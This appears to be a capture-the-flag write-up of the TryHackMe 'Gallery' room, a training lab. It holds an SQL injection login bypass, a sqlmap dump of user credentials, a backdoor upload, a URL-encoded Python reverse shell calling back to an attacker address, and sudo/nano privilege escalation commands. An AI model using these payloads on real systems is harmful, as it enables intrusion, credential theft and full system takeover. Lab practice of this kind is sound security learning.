Gallery

Posted on | In

You can find this machine here : https://tryhackme.com/room/gallery666

Port Scan

1
2
3
4
5
6
┌──(kali㉿Zeus)-[~]
└─$ nmap 10.10.66.67      

PORT     STATE SERVICE
80/tcp   open  http
8080/tcp open  http-proxy

Simple Image Gallery System - SQL Injection

image

  • We are able to login without password
  • Just type :
1
username : admin'#

image

1
2
3
4
5
6
7
┌──(kali㉿Zeus)-[~]
└─$ searchsploit Simple Image Gallery System
--------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                   |  Path
--------------------------------------------------------------------------------- ---------------------------------
Simple Image Gallery System 1.0 - 'id' SQL Injection                             | php/webapps/50198.txt
--------------------------------------------------------------------------------- ---------------------------------
  • Request

image

1
2
3
4
5
6
7
8
9
10
GET /gallery/?page=albums/images&id=6 HTTP/1.1
Host: 10.10.66.67
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.10.66.67/gallery/?page=albums
Cookie: PHPSESSID=3enduhu52j21fptfp8ck3fpqcs
Upgrade-Insecure-Requests: 1

SQLmap

1
sqlmap -r gal.req -D gallery_db -T users --dump

image

Upload a backdoor as album images

image

RCE Confirmed

image

Reverse Shell

  • payload
1
python3%20-c%20%27import%20os,pty,socket;s=socket.socket();s.connect((%2210.18.45.56%22,4444));[os.dup2(s.fileno(),f)for%20f%20in(0,1,2)];pty.spawn(%22sh%22)%27

image

  • better shell
1
2
3
4
python3 -c 'import pty; pty.spawn("/bin/bash")'
Control + z
stty raw -echo;fg
ENTER

Privileges Escalation to Mike

1
2
3
4
cd /var/backups/mike_home_backup
cat .bash_history
su mike
enter the password

image

Privileges Escalation to Root

1
2
3
4
5
6
7
8
9
mike@gallery:~$ sudo -l
sudo -l
Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh
mike@gallery:~$

rootkit.sh

cat /opt/rootkit.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#!/bin/bash

read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;

# Execute your choice
case $ans in
    versioncheck)
        /usr/bin/rkhunter --versioncheck ;;
    update)
        /usr/bin/rkhunter --update;;
    list)
        /usr/bin/rkhunter --list;;
    read)
        /bin/nano /root/report.txt;;
    *)
        exit;;
esac
  • exploitation
1
2
3
4
sudo -u root /bin/bash /opt/rootkit.sh
read
^R^X
reset; sh 1>&0 2>&0

Rooted

image